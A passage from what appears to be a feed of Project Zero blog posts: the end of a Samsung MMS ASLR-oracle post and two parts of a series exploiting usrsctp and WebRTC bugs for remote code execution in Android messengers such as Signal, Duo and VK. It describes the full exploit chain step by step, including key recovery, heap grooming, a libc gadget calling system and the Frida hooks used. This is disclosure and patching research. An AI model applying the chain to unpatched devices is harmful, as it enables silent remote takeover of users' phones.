  • By sending a very long SMS of 5180+ characters, which is divided into 34 segments of 140 characters each. The target phone starts receiving the SMS segments, roughly one per second, but for some reason (I didn't investigate this deeply) it stops reassembling the message after the 33rd part, and abandons it completely without generating any notifications. During the process of receiving and saving the initial portions of the SMS in the internal database, the uptimeMillis clock progresses by around 35 seconds in my test setup.

These are some basic ideas for ways to transmit data to the phone such that it has to spend cycles processing it, but fails at some point before notifying the owner. I am sure many more similar techniques exist, and specialized software such as NowSMS certainly helps put the relevant mobile apps to the test against very unusual conditions. All in all, the nature of the uptimeMillis clock is not a fundamental barrier in remote Android exploitation, but it is an annoying aspect that needs to be addressed with the use of additional techniques, and it may extend the overall attack time and impair its reliability. With 60 seconds of active CPU time required between each ASLR oracle query, we might also start being concerned about the extent of power consumption induced by the exploit on target phones with low battery levels… :)

Summary

In this episode, we set up an environment to programmatically send MMS messages from a Windows PC, and learned the basics of the client ⟷ MMSC MM1 protocol and its encapsulation encoding. This enabled us to specify the X-Mms-Delivery-Report header in outgoing messages, and abuse the delivery report feature to establish a 1-bit side channel indicating if the recipient's Messages app crashed while processing our malformed Qmage image or not. Based on this capability and the address-probing primitive built in Part 3, we now have a fully functional (albeit somewhat slow) ASLR oracle at our disposal. We are getting close to defeating ASLR and finally executing arbitrary code.

To make further progress in the research, we have to face a few remaining questions:

  • What types of addresses are we interested in leaking? Which libraries will be needed to achieve RCE, and do we also need to disclose any data locations?
  • How do we find any regions in memory at all, starting with absolutely no initial insight as to where they might be located?
  • Finally, how do we achieve this in a relatively small number of steps (preferably low hundreds), such that the attack has a realistic execution time?

All of these matters will be discussed in detail in the upcoming Part 5. Stay tuned!

Exploiting Android Messengers with WebRTC: Part 2

5 August 2020 at 16:01
By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. Part 3 is scheduled for August 6.

Part 2: A Better Bug


In Part 1, I explored whether it was possible to exploit WebRTC using two memory corruption bugs in RTP processing. While I succeeded at moving the instruction pointer, I was not able to break ASLR, so I decided to look for vulnerabilities more suitable for this purpose.

usrsctp


I started off by going through WebRTC bugs I had filed in the past to see if any had the potential to break ASLR. Even if a bug was fixed long ago, it is an indicator of where similar bugs could potentially be found. One such bug was CVE-2020-6831, which is an out-of-bounds read in usrsctp.

usrsctp is an implementation of Stream Control Transmission Protocol (SCTP) used by WebRTC. Applications that use WebRTC can open data channels, which allow text or binary data to be transmitted from peer to peer. Data channels are often used to allow text messages to be exchanged during a video call, or to tell a peer when certain events have occurred, such as another peer disabling its camera. SCTP is the protocol that underlies data channels. In WebRTC, SCTP is analogous to RTP in that where RTP is used for audio and video content, SCTP is used for data.

I spent some time reviewing the usrsctp code for vulnerabilities. I eventually found CVE-2020-6831, which is a stack buffer overflow in usrsctp. This bug gives the attacker complete control of the size and contents of the overflow. Samuel Groß suggested that this bug could be used to break ASLR by overwriting the stack cookie, and then the return address one byte at a time, and detecting whether the value is correct based on whether the application crashes. Unfortunately, it turned out that this vulnerability is not reachable through WebRTC, as it requires a client socket to connect to a listening socket, meanwhile in WebRTC, both sockets are client sockets.

I kept looking and eventually found CVE-2020-6514. This is a rather unusual bug in how WebRTC interacts with usrsctp. usrsctp supports custom transports, in which case the integrator needs to provide the source and destination address for each connection as a pair of void pointers. The non-dereferenced value of these pointers is then used as an address by usrsctp, which means the value is included in some packets. In WebRTC, the address pointers are set to the address of the SctpTransport instance used by WebRTC. The result is that the location of this object in memory is sent to the remote peer during every SCTP connection. This is technically a bug in WebRTC, though the design of usrsctp is also flawed because using the type void* for custom addresses strongly encourages integrators to use pointers for this value even though this is insecure.

I was hoping this bug would be enough to break ASLR, but it turned out not to be. For an exploit, I needed the location of a loaded library, as well as the location of the heap, so I ran a series of tests on an Android device to see if there was any correlation between these locations, but there was not any. The location of a heap pointer was not enough to determine the location of a loaded library.

I kept looking, and I noticed a vulnerability in how usrsctp processes ASCONF chunks, which are used to manage dynamic IP addresses. The source for the bug is as follows.

if (param_length > sizeof(aparam_buf)) {
SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) larger than buffer size!\n", param_length);
sctp_m_freem(m_ack);
return;
}

if (param_length <= sizeof(struct sctp_paramhdr)) {
SCTPDBG(SCTP_DEBUG_ASCONF1, "handle_asconf: param length (%u) too short\n", param_length);
sctp_m_freem(m_ack);
}

Notice that the second call to sctp_m_freem is missing a return, so the m_ack variable can be used after it is freed. After finding this bug, I noticed that it had been patched in more recent versions of usrsctp and WebRTC. I later learned that it was reported by another Googler, Mark Wodrich as Bug 376 in usrsctp on September 19, 2019.

Revealing Memory with Bug 376


Two important questions in analyzing a use-after-free bug is what is freed, and how is it used. In Bug 376, the freed object is an mbuf structure, a type which is used to store the contents of inbound and outbound packets. The mbuf structure starts with a substructure, m_hdr, which is defined as follows.

struct m_hdr {
struct mbuf *mh_next; /* next buffer in chain */
struct mbuf *mh_nextpkt; /* next chain in queue/record */
caddr_t mh_data; /* location of data */
int mh_len; /* amount of data in this mbuf */
int mh_flags; /* flags; see below */
short mh_type; /* type of data in this mbuf */
uint8_t          pad[M_HDR_PAD];/* word align                  */
}

Now, how is this structure used? Looking through the rest of the ASCONF handling, it is eventually added to an outbound packet queue to acknowledge the packet that was sent.

TAILQ_INSERT_TAIL(&stcb->asoc.asconf_ack_sent, ack, next);

This made it very likely that this bug could be used to reveal memory of a remote peer if the freed m_buf structure was replaced with a structure with a pointer to memory continuing pointers, for example, the SctpTransport pointer revealed by CVE-2020-6514.

I tried to do this by sending RTP packets of the same size as the m_buf structure. There’s a nice trick for making a lot of allocations of a specific size that don’t get freed in WebRTC. Video packets get stored in a list before they are assembled into frames, so if the end of a frame is never sent, they will get stored forever, so long as a maximum number of packets is never hit. Unfortunately, this led to an unexpected problem. OpenSSL, which is used by WebRTC happened to have some heap allocations of the same size as an m_buf structure, and if they happened to be allocated in the place of the freed m_buf structure, they would get written to in the m_buf send process, which for some reason would lead to an irrecoverable state in OpenSSL. The application didn’t crash, it would just get stuck in some sort of loop and refuse to accept any more connections.

So I decided it would be better to allocate the memory replacing the m_buf structure in usrsctp. SCTP allows packets containing any number of chunks to be sent to a host, and in most cases they are processed as if they were a sequence of packets. Even better, the outbound packet queue that the freed m_buf structure is added to does not send any packets until all chunks in the current packet have been processed. This means that it should be possible to send a packet that contains a chunk that triggers the bug, and then a chunk that sets the freed memory to the needed values before it is sent back to the attacker. Since no network traffic needs to occur between when the m_buf structure is freed and when its memory is safely reallocated, this avoids the problem with OpenSSL.

Unfortunately, there are very few calls to malloc in usrsctp with sizes that are controllable by incoming traffic, and none of them allow the entire packet contents to be specified. The best I could find was in the processing of a data stream reset chunk. The code is as follows, with some parts removed for clarity.

if (asoc->str_reset_seq_in == seq) {
len = ntohs(req->ph.param_length);
number_entries = ((len - sizeof(struct
sctp_stream_reset_out_request)) / sizeof(uint16_t));
tsn = ntohl(req->send_reset_at_tsn);
asoc->last_reset_action[1] = asoc->last_reset_action[0];
if (...) {
...
} else if (SCTP_TSN_GE(asoc->cumulative_tsn, tsn)) {
/* we can do it now */
...
} else {
/*
* we must queue it up and thus wait for the TSN's
* to arrive that are at or before tsn
*/
struct sctp_stream_reset_list *liste;
int siz;
siz = sizeof(struct sctp_stream_reset_list) +
(number_entries * sizeof(uint16_t));
SCTP_MALLOC(liste, struct sctp_stream_reset_list *, siz, SCTP_M_STRESET);
if (liste == NULL) {
/* gak out of memory */
asoc->last_reset_action[0] =
SCTP_STREAM_RESET_RESULT_DENIED;
sctp_add_stream_reset_result(chk, seq,
asoc->last_reset_action[0]);
return;
}
liste->seq = seq;
liste->tsn = tsn;
liste->number_entries = number_entries;
memcpy(&liste->list_of_streams, req->list_of_streams,
number_entries * sizeof(uint16_t));
TAILQ_INSERT_TAIL(&asoc->resetHead, liste,
next_resp);

This code allocates the liste structure, which can be used to replace the freed mbuf structure. It has one really lucky feature, which is that the next_resp property, which lines up with the mh_next property of the mbuf structure happens to be of the correct type, also mbuf. This would cause problems if it were another type, as usrsctp iterates through the entire mbuf chain before sending a packet.

A less lucky feature is that the properties that line up with the mh_data property of mbuf structure happen to be the current reset sequence number, and the transmission sequence number (TSN). These both are subject to a number of checks in this method. The reset sequence number needs to be exactly equal to the sequence number set when the connection was initialized, either in an INIT or COOKIE_ECHO chunk, and also needs to be equal to the lower four bytes of the SctpTransport pointer. This check can be passed by sending a COOKIE_ECHO chunk that sets the reset sequence number to the needed value before triggering the bug.

More challenging is the check that is performed on the TSN. It is compared to the cumulative TSN, which is originally set to the same value as the reset sequence number. The actual comparison performed is a ‘sequence number greater than’, which determines whether one value is ahead of or behind another value, assuming sequence numbers that roll over to zero when all bits are set. For example, if the current sequence number is 0xFFFFFFFF, the value 2 would pass a  ‘sequence number greater than’ check, but the values 0xFFFFFFFE and 0x80000001 would fail. The TSN read out of the incoming packet has to be the top four bytes of the SctpTransport pointer, meanwhile the cumulative TSN has to be the bottom four bytes of this pointer because it is the same value as the reset sequence number. So this is actually a comparison between the two halves of the pointer. The TSN is a small number, less than 0x80 because it is the top of a pointer, so this comparison will return true roughly whenever bit 31 of the pointer is not set, and return the desired outcome of false roughly whenever it is set.

Bit 31 of the pointer is determined randomly by ASLR as well as where the SctpTransport instance is allocated on the heap, which means it is set about 50% of the time. Normally, I would be okay with an exploit being 50% effective, because that means it would probably succeed with a few tries, but in this case, that’s not true because it will have the tendency to fail again and again on the same ASLR layout. ASLR layout is determined when an Android device is started up, and doesn’t change again until it is rebooted. So I needed a way to change the cumulative TSN after the reset sequence number has been set.

It turns out that this is possible using the FWD_TSN chunk type, which allows a peer to request that another peer move its cumulative TSN up to 4096 bytes forward. It’s possible to move the cumulative TSN forward enough that bit 31 flips by sending this chunk type repeatedly.  This takes quite a few chunks, but combining chunks into fewer packets and sending them as fast as possible, it can be flipped in a few seconds.

Putting this all together, the bug can be used to make the target device send back the memory of the SctpTransport instance, which contains a pointer to the class’s vtable, finally giving the location of the WebRTC library and breaking ASLR.

Thinking about it a bit, I didn’t think the WebRTC library would be the best library to use for my exploit, as it’s not unusual for WebRTC integrators to statically link it with other libraries and use all sorts of toolchains. It would be easier to know the location of libc, which comes from the Android system and has less variation. So I added a second usage of this bug that reads the location of malloc from the global offset table, which is a fixed offset from the SctpTransport vtable that has already been read. This allows the location of libc to be calculated.

Moving the Instruction Pointer (Again)


In Part 1, I figured out how to use an RTP memory corruption bug to move the instruction pointer, but after I filed CVE-2020-6514, Jann Horn suggested that it might be possible to use this bug to move the instruction pointer as well. When WebRTC uses the SctpTransport pointer as an address, it doesn’t just use it to identify the connection, but it actually casts the pointer to class SctpTransport, and makes virtual calls on it when sending outbound packets received from usrsctp.

Meanwhile, usrsctp usually determines the address for outbound packets based on identifiers in the packet, but there is one situation where it extracts the address from the packet itself: when processing COOKIE_ECHO chunks. Normally, it wouldn’t be possible to put an untrusted pointer in this chunk type, as are usually echoed from an incoming packet and need to be signed. However, Jann noticed that the random number generation for the signing key is very weak. The following code gets called when usrsctp is initialized.

srandom(getpid()); 

The random number generator is then seeded by calling rand.

The INIT chunk sent when starting an SCTP connection contains a randomly generated key used for authentication, generated by the same random number generator used for the secret key. I wrote a script that determines the value of the remote PID based on this key, by calling srand on every number between 0 and 70 000, and seeing which one causes the random number generator to produce the same authentication key. It is then possible to infer the value of the secret key.

This key now allows the attacking device to send COOKIE_ECHO chunks with any contents, including changing the address to a custom pointer. This allows the instruction pointer to be moved, as a virtual call will be made on whatever address is provided the next time an outbound packet is sent, which happens immediately when the peer responds with a COOKIE_ACK. In the above section, I also discussed using COOKIE_ECHO packets to change the reset sequence number, while glossing over how I was actually sending them. It was using this same method.

I now had two possible methods for setting the instruction pointer in the exploit. I chose to move forward with this one, as it uses usrsctp, which is also necessary to break ASLR, meanwhile the RTP one uses a different feature. I felt that reducing the number of features needing to be enabled for this exploit to work would increase the number of applications it worked on, as sometimes applications disable specific WebRTC features.

Putting it All Together


Having all the necessary capabilities for an exploit, I then needed to put them all together. My general strategy was to make a fake object on the heap at a known location, and then make a virtual call on that object. The fake object would have a fake vtable in the same buffer that would point to system, which would run a shell command.

One missing piece is how to populate heap memory at a known location. One possibility was to use RTP to allocate memory of the same size as the SctpTransport object, hoping it gets allocated at the address directly after the object, or at a predictable location. I tried this, and it worked maybe 50% of the time, but considering I had a way to read memory, I thought I could do better.

I noticed that the SctpTransport class contains a CopyOnWriteBuffer object named partial_incoming_message_ that is sometimes used to store incoming SCTP data. SCTP supports data fragmentation, and usrsctp passes incomplete fragmented packets to WebRTC if they get above a certain size. These are stored in the partial_incoming_message_ object until the rest of the packet is received. So I thought if I sent the data for the fake object over SCTP to the target device, it would eventually populate this buffer, and I could read the address. (Note that this actually requires two reads, as there are two levels of indirection between a CopyOnWriteBuffer object and its backing data.)

I tried this, and it worked, but there was another problem. In order to create a fake object with a fake vtable, the fake object needed to reference itself, but this method only allowed me to know the location of the memory after it had been written to and couldn’t be changed. I looked a bit closer at how this functionality works. The code for setting the buffer is as follows.

transport->partial_incoming_message_.AppendData(
          reinterpret_cast<uint8_t*>(data), length);
          ...
if (!(flags & MSG_EOR) && (transport->partial_incoming_message_.size() < kSctpSendBufferSize)) {
        return 1;
      }
...
transport->invoker_.AsyncInvoke<void>(
RTC_FROM_HERE, transport->network_thread_,
rtc::Bind(&SctpTransport::OnInboundPacketFromSctpToTransport,
transport, transport->partial_incoming_message_, params,
flags));
transport->partial_incoming_message_.Clear();

What’s happening here is that incoming data is always immediately appended to the partial_incoming_message_ buffer, and then if it is an incomplete fragment, the function returns. Otherwise, it queues a thread to process the data, and then clears the buffer.

I started to wonder how clearing works, considering the data is still needed by the queued thread that might not be finished yet. It turns out that the  CopyOnWriteBuffer class retains references to the data, and only deletes it if there are zero references left. Otherwise, it decrements the reference count and allocated new data of the current size for the buffer. This means it is possible to read the location of the _incoming_message_ buffer before data is written to it, because it is actually allocated during the clear. So long as the data written by AppendData is shorter or the same size as the largest size ever cleared, this memory will not be reallocated.

This allowed me to create a heap buffer at a known location and populate it. The last step was to figure out what to populate it with. I started out by filling it up with sequential numbers, and then using the address it crashed on to figure out what memory to change. After using the crash locations to create the fake vtable, I ended up with a crash on a branch to X8, and the only other controllable register was X21. X0 was of course set to the location of the fake vtable, as this crash was due to a virtual call, as were X1 and X23.

Astoundingly, libc had the perfect gadget for this situation.

do_nftw(char const*,int (*) …) + 0x138

LDR             X0, [X23,#0x30]
LDR             X1, [X23,#0x70]
BLR             X21

Setting the value loaded in X23 to system, and copying a string parameter at an offset of 0x30 past the fake vtable caused system to be called with the parameter!

To give a quick overview, here are the steps required for the exploit, in order:

  1. The PID is determined based on the key in the INIT chunk, and then the secret key is determined
  2. The vtable is read from the SctpTransport object
  3. The location of malloc is read from the global offset table
  4. The partial_incoming_message_ buffer is populated with data of the needed size
  5. The partial_incoming_message_ buffer is cleared, so a new buffer is allocated
  6. The address of the partial_incoming_message_ buffer is read from the SctpTransport object
  7. The address of the partial_incoming_message_ backing buffer is read from the buffer structure
  8. The partial_incoming_message_ buffer is populated with exploit data, based on the location of of malloc
  9. The bug is triggered, making a virtual call to a gadget and then system

Now I had an exploit that worked in … the WebRTC sample Android application. Stay tuned for Part 3, where I explore what real Android applications the exploit works on.

Exploiting Android Messengers with WebRTC: Part 3

6 August 2020 at 18:05
By: Tim

Posted by Natalie Silvanovich, Project Zero


This is a three-part series on exploiting messenger applications using vulnerabilities in WebRTC. CVE-2020-6514 discussed in the blog post was fixed on July 14 with these CLs.This series highlights what can go wrong when applications don't apply WebRTC patches and when the communication and notification of security issues breaks down. 

Part 3: Which Messengers?

In Part 2, I described an exploit for WebRTC on Android. In this section, I explore which applications it works on.

The exploit

When writing the exploit, I originally altered the SCTP packets sent to the target device by altering the source of WebRTC and recompiling it. This wasn’t practical for attacking closed source applications, so I eventually switched to using Frida to hook the binary of the attacking device instead. Frida’s hooking functionality allows for code to be executed before and after a specific native function is called, which allowed my exploit to alter outgoing SCTP packets as well as inspect incoming ones. Functionally, it is equivalent to altering the source of the attacking client, but instead of the alterations being made in the source at compile time, they are made dynamically by Frida at run time. The source for the exploit is available here.

There are seven functions that the attacking device needs to hook, as follows.

usrsctp_conninput // receives incoming SCTP
DtlsTransport::SendPacket // sends outgoing SCTP
cricket::SctpTransport::SctpTransport // detects when SCTP transport is ready
calculate_crc32c // calculates checksum for SCTP packets
sctp_hmac // performs HMAC to guess secret key
sctp_hmac_m // signs SCTP packet
SrtpTransport::ProtectRtp // suppresses RTP to reduce heap noise

These functions can be hooked as symbols, or as offsets in the binary.

There are also three address offsets from the binary of the target device that are needed for the exploit to work.  The offset between the system function and the malloc function, as well as the offset between the gadget described in the previous post and the malloc function are two of these. These offsets are in libc, which is an Android system library, so they need to be determined based on the target device’s version of Android. The offset from the location of the cricket::SctpTransport vtable to the location of malloc in the global offset table is also needed. This must be determined from the binary that contains WebRTC in the application being attacked.

Note that the exploit scripts provided have a serious limitation: every time memory is read, it only works if bit 31 of the pointer is set. The reasons for this are explained in Part 2. The exploit script has an example of how to fix this and read any pointer using FWD_TSN chunks, but this is not implemented for every read. For testing purposes, I reset the device until the WebRTC library was mapped in a favorable location.

Android Applications

A list of popular Android applications that integrate WebRTC was determined by searching APK files on Google Play for a specific string in usrsctp. Roughly 200 applications with more than five million users appeared to use WebRTC. I evaluated these applications to determine whether they could plausibly be affected by the vulnerabilities in the exploit, and what the impact would be.

It turned out the ways applications use WebRTC are quite varied, but can be separated into four main categories.

  • Projection: the screen and controls of a mobile application is projected into a desktop browser with user consent for enhanced usability
  • Streaming: audio and video content is sent from one user to many users. Usually there is an intermediary server, so the sender does not need to manage possibly thousands of peers, and the content is recorded for later viewing
  • Browsers: all major browsers contain WebRTC to implement the JavaScript WebRTC API
  • Conferencing: two or more users communicate via audio or video in real time

The impact of the vulnerabilities used in the exploit is different for each of these categories. Projection is low risk, as a lot of user interaction is required to set up the WebRTC connection, and the user has access to both sides of the connection in the first place, so there is little to gain by compromising the other side. 

Streaming is also fairly low risk. While it’s possible that some applications use peer-to-peer connections when a stream has a low number of viewers, they usually use an intermediary server that terminates the WebRTC connection from the sending peer, and starts new connections with the receiving peers. This means that the attacker usually cannot send malformed packets directly to a peer. Even with a set-up where streaming is performed peer-to-peer, user interaction is required for the target to view the stream, and there’s often no way to limit who can access a stream. For this reason, streaming applications that use WebRTC are probably not useful for targeted attacks. Of course, it is possible that these vulnerabilities affect the servers used by streaming services, but this was not investigated in this research.

Browsers are almost certainly vulnerable to most bugs in WebRTC, because they allow a large amount of control over how it is configured. To exploit such a bug in a browser, an attacker would need to set up a host that acts like the other peer in the peer-to-peer connection, and convince the target to visit a webpage that starts a call to that host. In this case, the vulnerability would have a similar impact to other memory corruption vulnerabilities in JavaScript.

Conferencing is the highest risk usage of WebRTC, but the actual impact of a vulnerability depends on a lot of how users of an application contact each other. The highest risk design is an application where any user can contact any other user based on an identifier. Some applications require the callee to have interacted in a specific way with the caller before a call can be made, which makes users harder to contact a target and generally reduces risk. Some applications require users to enter a code or visit a link to start a call, which has a similar effect. There is also a large group of applications where it is difficult or impossible to call a specific user, for example chat roulette applications, and applications which have features that allow a user to start a call to customer support. 

For this research, I focused on conferencing applications that allow users to contact specific other users. This reduced my list of 200 applications to 14 applications, as follows.

Name
Installs on Play Store
1B
1B
1B
500M
100M
OK and TamTam (similar apps by same vendor)
100M/10M
100M
50M
10M
10M
10M
10M

This list was compiled on June 18, 2020. Note that a few applications were removed because their server was not operational on that day, or they were very difficult to test (for example, required watching multiple ads to make a single call).

One application tested will not be identified in this blog post, as a serious additional vulnerability was discovered in the process of testing that has not yet been fixed or reached its disclosure deadline. This blog post will be updated when the disclosure deadline has passed. Update (2020-10-14): The affected application was Mocha. We discovered this vulnerability.

Testing the Exploit

The following section describes my attempts to test the exploit against the above applications. Please note that due to the number of applications, limited time was spent on each, so there is no guarantee that every attack against WebRTC was considered. While I am very confident that applications found to be exploitable are indeed exploitable, I am less confident about applications found to be not exploitable. If you need to know whether a specific application is vulnerable for the purposes of protecting users, please contact the vendor instead of relying on this post.

Signal

I started off by testing Signal because it is the only open-source application on this list. Signal integrates WebRTC as a part of a library called ringrtc. I built ringrtc and then Signal with symbols, and then hooked the needed symbols with the Frida script on the attacker device. I tried the exploit and it worked about 90% of the time!




This attack did not require any user interaction with the target device because Signal starts the WebRTC connection before an incoming call is answered, and this connection can accept incoming RTP and SCTP. The exploit is not 100% reliable on Signal and other targets because Bug 376 requires that a freed heap allocation is replaced with the next allocation of the same size performed by the thread, and occasionally another thread will do an allocation of the same size in the meantime. Failure results in a crash that is usually not evident to the user because the process respawns, but a missed call will appear.

This exploit was performed on Signal 4.53.6 which was released on January 13, 2020, as Bug 376 had already been patched in Signal by the time I finished the exploit. CVE-2020-6514 was also fixed in later versions, and ASCONF has also been disabled in usrsctp, so the code that caused Bug 376 is no longer reachable. Signal has also recently implemented a feature that requires user interaction for the WebRTC connection to be started when the caller is not in the callee’s contacts. Signal has also stopped using SCTP in their beta version, and plans to add this change to the release client once it is tested. The source for this exploit is available here.

Google Duo


Duo was also an interesting target, as it is preinstalled on so many Android devices. It dynamically links the Android WebRTC library, libjingle_peerconnection_so.so with no obvious modifications. I reverse engineered this library in IDA to find the location of all the functions that needed to be hooked, and then modified the Frida script to hook them based on their offsets from an exported symbol. I also modified the offset between the cricket::SctpTransport vtable and the global offset table, as it was different than in Signal. The exploit also worked on Duo. Source for the Duo exploit is available here.



This vulnerability did not require any user interaction, as like Signal, Duo starts the WebRTC connection before a call is answered.

The exploit was tested on version 68.0.284888502.DR68_RC09 which was released on December 15, 2019. The vulnerability has since been fixed. Also, at the time this application was released, it was possible for Duo to call any Android device with Google Play Services installed, regardless of whether Duo had been installed. This is no longer the case. A user now needs to set up Duo and have the caller in their contacts for an incoming call to be received.

Google Hangouts


While Google Hangouts uses WebRTC, it does not use data channels, and does not exchange SDP in order to set up calls, so there is no obvious way to enable them from a peer. For that reason, the exploit does not work on Hangouts.

Facebook Messenger


Facebook Messenger is another interesting target. It has a large number of users, and according to its documentation, any user can call any other user based on their mobile number. Facebook Messenger integrates WebRTC into a library called librtcR11.so, which dynamically links to usrsctp from another library, libxplat_third-party_usrsctp_usrsctpAndroid.so. Facebook Messenger downloads these libraries dynamically as opposed to including them in the APK, so it is difficult to identify the version I examined, but it was downloaded on June 22, 2020. 

The librtcR11.so library appears to use a version of WebRTC that is roughly six years old, so it was before the class cricket::SctpTransport existed. That said, the analogous class cricket::DataMediaChannel appeared to be vulnerable to CVE-2020-6514. The libxplat_third-party_usrsctp_usrsctpAndroid.so library appears to be more modern, but contains the vulnerable code for Bug 376. That said, it does not appear to be possible to reach this code from Facebook Messenger, as it is set to use RTP data channels as opposed to SCTP data channels, and does not accept attempts to change the channel type via Session Description Protocol (SDP). While it is not clear whether the motivation behind this design is security, this is a good example of how restricting attacker access to features can reduce an application’s vulnerability. Facebook also waits until a call is answered before starting the WebRTC connection, which further reduces the exploitability of any WebRTC vulnerabilities that affect it.

Interestingly, Facebook Messenger also contains a more modern version of WebRTC in a library called librtcR20.so, but it does not appear to be used by the application. It is possible to get Facebook Messenger to use the alternate library by setting a system property on Android, but I could not find a way an attacker could cause a device to switch libraries.

Viber


Like Facebook Messenger, while Viber version 13.3.0.5 appeared to contain the vulnerable code, but the application disables SCTP when the PeerConnectionFactory is created. This means an attacker cannot reach the vulnerable code.

VK


VK is a social networking app released by Mail.ru in which users have to explicitly allow specific other users to contact them before each user is allowed to call them. I tested my exploit against VK, and it required some modifications to work. To start, VK doesn’t use data channels as a part of its WebRTC connection, so I had to enable it. To do this, I wrote a Frida script that hooks nativeCreateOffer in Java, and makes a call to createDataChannel before the offer is created. This was sufficient to enable SCTP on both devices, as the target device determines whether to enable SCTP based on the SDP provided by the attacker. The version of WebRTC was also older than the one I wrote the exploit for. WebRTC doesn’t contain any version information, so it is difficult to tell for sure, but the library appeared to be at least one year old based on log entries. This meant that some of the offsets in the ‘fake object’ used by the exploit were different. With a few changes, I was able to exploit VK.

VK sends an SDP offer to a target device to start a call, but the target does not return the SDP answer until the user has accepted the call, which means this exploit requires the target to answer the call before the WebRTC connection is started. This means the exploit will not work unless the target manually answers the call. In the video below, the exploit takes a fair amount of time to run after the user has answered. This is due to how I designed the exploit, and not due to fundamental limitations of the vulnerabilities it uses. In particular, the exploit waits for usrsctp to generate specific packets even though they could be generated more quickly by the exploit script, and also uses delays to avoid packet reordering when responses could be checked instead. It is likely that with enough effort, this exploit could run in less than five seconds. Also note that I altered the exploit to work with a single incoming call, as opposed to two incoming calls in the exploits above, as it is not realistic to expect a target to answer a call twice in quick succession. This didn’t require substantial changes to how the exploit works, though it does make the exploit code more complex and difficult to debug.



Regardless, the requirement that a user must choose to accept calls from an attacker before they can call, alongside the requirement that the user answer the call and stay on the line for a few seconds makes this exploit substantially less useful against VK compared to applications without these features.

Testing was performed against VK 6.7 (5631). Like Facebook, VK dynamically downloads its version of WebRTC, so it is difficult to specify its version, however testing was performed on July 13, 2020. VK has since updated their servers so that a user cannot start a call with SDP that contains data channels, so the exploit no longer works. Note that VK does not use WebRTC for two-party calls, only group calls, so I tested this exploit using a group call. The source for the exploit is available here.

OK and TamTam


OK and Tamtam are similar messaging applications released by the same vendor, also Mail.ru. They use a dynamically downloaded version of WebRTC that is identical to the one used by VK. Since the library is exactly the same, my exploit also worked on OK, and I didn’t bother also testing TamTam because it is so similar.



Like VK, OK and TamTam do not return the SDP answer until the target has answered the call by interacting with the phone, so this is not a fully remote exploit on OK and TamTam. OK also requires users to choose to accept messages from another user before the user can call them. TamTam is a bit more liberal, for example, if a user verifies a phone number, any user who has their phone number can contact them.

Testing was performed on version 20.7.7 of OK on Monday, July 13. SDP-only testing was performed on TamTam version 2.14.0. Since then, the servers for these applications have been updated so that SDP containing data channels cannot be used to start a call, so the exploit no longer works.

Discord
Discord has documented its use of WebRTC thoroughly. The application uses an intermediary server for WebRTC connections, which means that it is not possible for a peer to send raw SCTP to another peer, which is required for the exploit to work. Discord also requires several clicks to enter a call. For these reasons, Discord is not affected by the vulnerabilities discussed in this post.

JioChat


JioChat  is a messaging application that allows for any user to call any other user based on phone number. Analyzing version 3.2.7.4.0211, it appeared that its WebRTC integration contained both vulnerabilities, and the app exchanges the SDP offer and answer before the callee accepts the incoming call, so I expected the exploit to work without user interaction. However, this was not the case when I tested it, and it turns out that JioChat uses a different strategy to prevent the WebRTC connection from starting until the callee has accepted the call. I was able to easily bypass this strategy, and get the exploit to work on JioChat.



Unfortunately, JioChat’s connection delay strategy introduced another vulnerability, which has been fixed, but the disclosure period has not expired for. For this reason, details of how to bypass it will not be shared in this blog post. The source for the exploit without this functionality is available here. JioChat has recently updated their servers so that SDP containing data channels cannot be used to start a call, meaning that the exploit no longer works on JioChat.

Slack and ICQ


Slack and ICQ are similar in that they both integrate WebRTC, but do not use the transport features of the library (note that Slack doesn’t integrate WebRTC directly for audio calls, it integrates Amazon Chime, which integrates WebRTC). They both use WebRTC for audio processing only, but implement their own transport layer and do not use WebRTC’s RTP and SCTP implementations. For this reason, they are not vulnerable to the bugs discussed in this blog post, and many other WebRTC bugs.

BOTIM


BOTIM has an unusual design that prevents the exploit from working. Instead of calling createOffer and exchanging SDP, each peer generates its own SDP based on a small amount of information from the peer. SCTP is not used by this application by default, and it was not possible to use SDP to turn it on. Therefore, it was not possible to use this exploit. BOTIM does appear to have a mode where it exchanges SDP with a peer, but I could not figure out how to enable it.

Other Application


The exploit worked in a fully remote fashion on one other application, but setting up the exploit revealed an obvious additional serious vulnerability in the application. Details of the exploit’s behavior on the application will be released after the disclosure period has expired for the vulnerability.

Discussion

The Risk of WebRTC

Out of the 14 applications analyzed, WebRTC enabled a fully remote exploit on four applications, and a one-click exploit on two more. This highlights the risk of including WebRTC in a mobile application. WebRTC does not pose a substantially different risk than other video conferencing solutions, but the decision to include video conferencing in an application introduces a large remote attack surface that wouldn’t be there otherwise. WebRTC is one of the few fully remote attack surfaces of a mobile application, and of Android in general. It is likely the highest risk component in almost every application that uses it for video conferencing.

Video conferencing is vital to the functionality of some applications, but in others it is an ‘extra’ that is rarely used. Low usage does not make video conferencing any less of a risk to users. It is important for software makers to consider whether video conferencing is a truly necessary part of their application, with a full understanding of the risk it presents to users.

WebRTC Patching

This research showed that many applications fall behind with regard to applying security updates to WebRTC. Bug 376 was fixed in September of 2019, yet only two of the 14 applications analyzed had patched it. There were several factors that led to this.

To start, usrsctp does not have a formal process for identifying and communicating vulnerabilities. Instead, bug 376 was fixed like any other bug, so the code was not pulled into WebRTC until March 10, 2020.  Even after it was patched, the bug was not noted on the Security Notes for the Chrome Stable channel, which is where WebRTC tells developers to look for security updates. This means that developers of applications that use an older version of WebRTC and cherry-pick fixes, or applications that include usrsctp separately from WebRTC would not be aware of the need to apply this patch.

This is not the full story though, as many applications include WebRTC as an unmodified library, and there have been other WebRTC vulnerabilities included in the Chrome Security Notes since March 2020. Another contributing factor is that until 2019, WebRTC did not provide any security patching guidance to integrators, in fact, their website inaccurately said that no vulnerabilities had ever been reported in the library, which occurred because WebRTC security bugs are generally filed in the Chromium bug tracker, and there was no process for considering these bug’s impact on non-browser integrators at the time. Many of the applications I analyzed had versions of WebRTC that predated this, so it is likely that the legacy of this incorrect guidance still causes applications to not update WebRTC. While WebRTC has done a lot to make it easier for integrators to patch WebRTC, for example allowing large integrators to apply for advance notice of vulnerabilities, there is still likely a long tail of integrators who have only seen the old guidance. Of course, there is no guarantee that integrators would have followed better guidance if it was available, but considering that for a long time it was very difficult for an integrator to know when and how to update WebRTC even if they wanted to, it is likely it would have had an impact.

